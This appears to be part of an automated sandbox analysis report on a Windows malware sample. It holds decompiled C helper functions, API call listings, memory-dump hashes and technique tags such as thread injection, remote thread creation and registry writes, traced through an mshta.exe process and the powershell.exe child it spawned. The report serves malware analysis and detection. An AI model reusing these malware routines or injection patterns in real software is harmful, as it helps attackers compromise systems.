                                                        0x01201584
                                                        0x0120158a

                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 01201537
                                                        • Sleep.KERNEL32(0000000A,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 01201541
                                                        • HeapFree.KERNEL32(00000000,?,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 0120156F
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 01201584
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                        • String ID:
                                                        • API String ID: 58946197-0
                                                        • Opcode ID: 736dcfda0d76a812a105d6ebfab06613246976eb55754e83d5a93bbdea6cb0cb
                                                        • Instruction ID: a631ad9d058d2349c9ee89eb3433247c056615f943390c713da161f93f179877
                                                        • Opcode Fuzzy Hash: 736dcfda0d76a812a105d6ebfab06613246976eb55754e83d5a93bbdea6cb0cb
                                                        • Instruction Fuzzy Hash: E2F0D074610201DFEB37CB24F84DB193BA6BB44705B484315E9479B397C771D850CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012042AE, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E012042AE(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E01205FBC(_t2);
				if(_t34 != 0) {
					_t30 = E01205FBC(_t28);
					if(_t30 == 0) {
						E012013CC(_t34);
					} else {
						_t39 = _a4;
						_t22 = E01207838(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E01207838(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                        0x012042ae
                                                        0x012042b8
                                                        0x012042ba
                                                        0x012042c0
                                                        0x012042c0
                                                        0x012042c9
                                                        0x012042cd
                                                        0x012042d9
                                                        0x012042dd
                                                        0x01204351
                                                        0x012042df
                                                        0x012042df
                                                        0x012042e3
                                                        0x012042ea
                                                        0x012042ed
                                                        0x01204307
                                                        0x012042f6
                                                        0x012042f6
                                                        0x012042fa
                                                        0x012042fd
                                                        0x01204302
                                                        0x01204302
                                                        0x0120430c
                                                        0x01204334
                                                        0x0120433a
                                                        0x0120433d
                                                        0x0120430e
                                                        0x01204310
                                                        0x01204318
                                                        0x01204323
                                                        0x01204328
                                                        0x01204328
                                                        0x01204344
                                                        0x0120434b
                                                        0x0120434c
                                                        0x0120434c
                                                        0x012042dd
                                                        0x0120435c

                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,01201314,00000000,00000000,00000000,05769698,?,?,012030D3,?,05769698), ref: 012042BA
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                          • Part of subcall function 01207838: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,012042E8,00000000,00000001,00000001,?,?,01201314,00000000,00000000,00000000,05769698), ref: 01207846
                                                          • Part of subcall function 01207838: StrChrA.SHLWAPI(?,0000003F,?,?,01201314,00000000,00000000,00000000,05769698,?,?,012030D3,?,05769698,0000EA60,?), ref: 01207850
                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01201314,00000000,00000000,00000000,05769698,?,?,012030D3), ref: 01204318
                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 01204328
                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 01204334
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                        • String ID:
                                                        • API String ID: 3767559652-0
                                                        • Opcode ID: b596d503c671b8ebad72fade4e1489b2410627158f28b44282b51e60ca431253
                                                        • Instruction ID: 84b70c5651f9413e577336e1d68cc10cfeabe3571c1f8c0f46575281905c66e1
                                                        • Opcode Fuzzy Hash: b596d503c671b8ebad72fade4e1489b2410627158f28b44282b51e60ca431253
                                                        • Instruction Fuzzy Hash: 9621E772410256EBCF13AF68C888AAFBFB8DF16284B149254FB099B243D731D940C7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01201370, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01201370(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E01205FBC(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                        0x01201385
                                                        0x01201389
                                                        0x01201393
                                                        0x0120139a
                                                        0x0120139d
                                                        0x0120139f
                                                        0x012013a7
                                                        0x012013ac
                                                        0x012013ba
                                                        0x012013bf
                                                        0x012013c9

                                                        APIs
                                                        • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0576930C,?,012053B4,004F0053,0576930C,?,?,?,?,?,?,01205131), ref: 01201380
                                                        • lstrlenW.KERNEL32(012053B4,?,012053B4,004F0053,0576930C,?,?,?,?,?,?,01205131), ref: 01201387
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,012053B4,004F0053,0576930C,?,?,?,?,?,?,01205131), ref: 012013A7
                                                        • memcpy.NTDLL(74B069A0,012053B4,00000002,00000000,004F0053,74B069A0,?,?,012053B4,004F0053,0576930C), ref: 012013BA
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: lstrlenmemcpy$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 2411391700-0
                                                        • Opcode ID: 72bdc45ad08953833cff81b95175ac25df0499dea0984a8d764dad331420722a
                                                        • Instruction ID: c3fe8533d998b4c5e0611fd88e305644d79e986902ea919d31fe8e2561789d00
                                                        • Opcode Fuzzy Hash: 72bdc45ad08953833cff81b95175ac25df0499dea0984a8d764dad331420722a
                                                        • Instruction Fuzzy Hash: C2F04F36900119FBDF11DFA8CC88C9FBBACEF092547014166EA08D7102E731EA149BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205C8D, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlen.KERNEL32(0576887A,00000000,00000000,00000000,01204AC6,00000000), ref: 01205C9D
                                                        • lstrlen.KERNEL32(?), ref: 01205CA5
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • lstrcpy.KERNEL32(00000000,0576887A), ref: 01205CB9
                                                        • lstrcat.KERNEL32(00000000,?), ref: 01205CC4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                        • String ID:
                                                        • API String ID: 74227042-0
                                                        • Opcode ID: f38cb67c61658852c11506e5da4d053bd4a71945ec84db6ad7bce5a6f07216d1
                                                        • Instruction ID: 8dc68b1775bdff1eaa3989ebec3e2b5dd4e78bcd9dd23c043e37f91d37279db8
                                                        • Opcode Fuzzy Hash: f38cb67c61658852c11506e5da4d053bd4a71945ec84db6ad7bce5a6f07216d1
                                                        • Instruction Fuzzy Hash: 37E01273501625A78B239BE8AC4CCAFBBADFF99655304061AF605D3216C7649805CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Analysis Process: mshta.exe PID: 1956 Parent PID: 3388 mshta.exeCOMMON

                                                        Executed Functions

                                                        Function 00000131FEDA0FC1, Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000003.649969924.00000131FEDA0000.00000010.00000001.sdmp, Offset: 00000131FEDA0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9fb1ed28ac7d61b781141f2856b4a72ffe1a3665778606b8829bb1ac2b4c8b60
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash: 619004154D540775D41411D10C453DD504577CCF54FD444C0441FF0545D44D03DF11F3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00000131FEDA0FB9, Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000026.00000003.649969924.00000131FEDA0000.00000010.00000001.sdmp, Offset: 00000131FEDA0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9fb1ed28ac7d61b781141f2856b4a72ffe1a3665778606b8829bb1ac2b4c8b60
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash: 619004154D540775D41411D10C453DD504577CCF54FD444C0441FF0545D44D03DF11F3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Analysis Process: powershell.exe PID: 4216 Parent PID: 1956 powershell.exeCOMMON

                                                        Executed Functions

                                                        Function 0000019D8B7CE95C, Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 643COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                        • Instruction ID: 57ac6b72fa8653b554d3fd25ac9e4b13dcd46c4f66ebdc11e8d7aa88581414af
                                                        • Opcode Fuzzy Hash: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                        • Instruction Fuzzy Hash: 7C226334618B09AFE7A9DF18E8A5BF673E1FB58300F44452DE45AC3296DF38E8458781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7D20A4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationQueryToken
                                                        • String ID: 0
                                                        • API String ID: 4239771691-4108050209
                                                        • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                        • Instruction ID: c2c493bb98736f9b833049788e11726fa452f77d103b98df6a2b90345610379e
                                                        • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                        • Instruction Fuzzy Hash: 15411934218B898FD764EF19D894BAAB7E2FB98301F54493DE48AC3255CB389945CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7DA8F0, Relevance: 4.7, APIs: 3, Instructions: 197nativethreadinjectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInformationProcessRemoteThread
                                                        • String ID:
                                                        • API String ID: 3020566308-0
                                                        • Opcode ID: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                        • Instruction ID: c81e37d4605f9f03267ce6bd696e02842d76961ad5e59a9766bff01c75aaa68f
                                                        • Opcode Fuzzy Hash: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                        • Instruction Fuzzy Hash: 9251B53460CB058FE764EF28E8997AA77E1FB98341F04452DE94AC3296DF38D8498741
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7C5B80, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Section$CreateView
                                                        • String ID: 0
                                                        • API String ID: 1585966358-4108050209
                                                        • Opcode ID: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                        • Instruction ID: 1d4c31c254ac8f7c6fc19044736aab98ebd699fe8177e6bf553e1e83894e103c
                                                        • Opcode Fuzzy Hash: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                        • Instruction Fuzzy Hash: F471C870618F099FEB54EF18E8D97A573E1FBA8301F10456ED84AC7256DB38E941CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7DB948, Relevance: 2.5, APIs: 1, Instructions: 1012synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$MutexQueueThreadUser
                                                        • String ID:
                                                        • API String ID: 1097034428-0
                                                        • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                        • Instruction ID: 219e155699776f4d648673060e4def4a9332576d075eb2a8aab4c04de595d309
                                                        • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                        • Instruction Fuzzy Hash: 9F72E874618B088FE758EF68FC956A977E1F758340F14452ED44BC32A6DE38D84ACB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7DB230, Relevance: 1.8, APIs: 1, Instructions: 286memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                        • Instruction ID: 68142382f695358de94b27306701b6e2fc9748291360039b5950a70b0690ff0a
                                                        • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                        • Instruction Fuzzy Hash: F491B534608F098FF758EF28EC597AA33E5FB94355F04452EE54AC3296EE78D8068B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7CE860, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationProcessQuery
                                                        • String ID:
                                                        • API String ID: 1778838933-0
                                                        • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                        • Instruction ID: 0edb75e6b1fa63adf8f4db4979da0df8ca0b11e5bc8ff85b5bd2594ed02f6e21
                                                        • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                        • Instruction Fuzzy Hash: 9C018F30214B08AFEB94DF68DCE4AB573E1FBA8305F50046EE859D3194D728E842C701
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7C8B90, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SectionView
                                                        • String ID:
                                                        • API String ID: 1323581903-0
                                                        • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                        • Instruction ID: 62a10afa50424e0b4a48582b6987fdcd61bff00ee31dd7ac864bc9f88cae8a31
                                                        • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                        • Instruction Fuzzy Hash: CD01C0B0A08B048FCB48EF69E4C8569BBE1FB58311B10066FE949CB796DB70D885CB45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7C1950, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3527976591-0
                                                        • Opcode ID: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                        • Instruction ID: 8843a922d4b1f0e5a58fd54ee443cb8a8f91352a5ac34e872cd1391fd4d4d7e3
                                                        • Opcode Fuzzy Hash: 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
                                                        • Instruction Fuzzy Hash: 6AE09278B14B855FE7005BB49CD83B973E0FB48301F10083DE885C76A1C62DC8404382
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7C2A8C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateValue
                                                        • String ID: ($(
                                                        • API String ID: 2259555733-222463766
                                                        • Opcode ID: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                        • Instruction ID: 706885eff1800ddfc2296d7cd60ad7537d5098d726a312dee3d6e07039b39fc7
                                                        • Opcode Fuzzy Hash: 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
                                                        • Instruction Fuzzy Hash: 92319234618B089FF764DF18EC697AAB7E5FB98305F10051DE449C32A2EB7C9946C705
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7D99D0, Relevance: 4.6, APIs: 3, Instructions: 146fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreatePointerRead
                                                        • String ID:
                                                        • API String ID: 2103328899-0
                                                        • Opcode ID: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                        • Instruction ID: d4a47114a9d9329f9fc67abab6a53869376ced2afd3d0a0be3a19b98bf70b137
                                                        • Opcode Fuzzy Hash: 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
                                                        • Instruction Fuzzy Hash: B741D53021CB084FDB58DF28ECD866973E1F788314F25466EE19AC7296DB79D846C781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7C80D4, Relevance: 3.2, APIs: 2, Instructions: 237threadinjectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$ResumeSuspend
                                                        • String ID:
                                                        • API String ID: 3472746266-0
                                                        • Opcode ID: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                        • Instruction ID: b8970602e30a35b81f9838b88f9614805a95ba45ceb71aec2a74b8049cdefc53
                                                        • Opcode Fuzzy Hash: ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
                                                        • Instruction Fuzzy Hash: A9718F3461CB085BE7A8EB18E8657FA73D1FB98301F10452DE58AC3193DF38D9458B46
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7B1CC4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateQueueThreadUser
                                                        • String ID:
                                                        • API String ID: 3600083758-0
                                                        • Opcode ID: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                        • Instruction ID: e39242f51eb2604db16f5699adc8397c549f2346df5b6cf2a4e567d69475506f
                                                        • Opcode Fuzzy Hash: 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
                                                        • Instruction Fuzzy Hash: B9012930714A094FEBA4EF6DA84D63976F2EB98351B25457AE409C3270DE78DC428B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7BA4DC, Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ContinueHandlerVectored
                                                        • String ID:
                                                        • API String ID: 3758255415-0
                                                        • Opcode ID: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                        • Instruction ID: 53e8f9af7dd84de8e6523fe38bfa636eb986896da282c42542038081e9e553e5
                                                        • Opcode Fuzzy Hash: 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
                                                        • Instruction Fuzzy Hash: 8351A574608B068FFB64EF28A8647BA77E1EB58355F25413DD446C22A2DE7CC9468F01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7DE4A4, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateValue
                                                        • String ID:
                                                        • API String ID: 2259555733-0
                                                        • Opcode ID: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                        • Instruction ID: 44fdc88b403980a4455a13d141b1be1f43504ea532124b705c6156a7a6eeabd8
                                                        • Opcode Fuzzy Hash: 535672abe70d0168ee810ee176c23215db19a3ba1e8f58e6fcab72b62e0214ff
                                                        • Instruction Fuzzy Hash: 1E21273461C74C8FE781EF68D858B9AB7E1FB98344F44092DE48AC3255EB78D544CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0000019D8B7C374C, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                        • Instruction ID: 74086f3f4f8ec181c0a7c1092442e207b8b4f3a0145800bf02c121b811ce4a80
                                                        • Opcode Fuzzy Hash: 3a96c24ec20924aeac69af3be795014768ecc2de191383b8bce9cd8f3f8db1b1
                                                        • Instruction Fuzzy Hash: 1511C834648B055FDB54EB5CA894769B7F1EBAC341F15042EE88DC33A1DA78C9418743
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions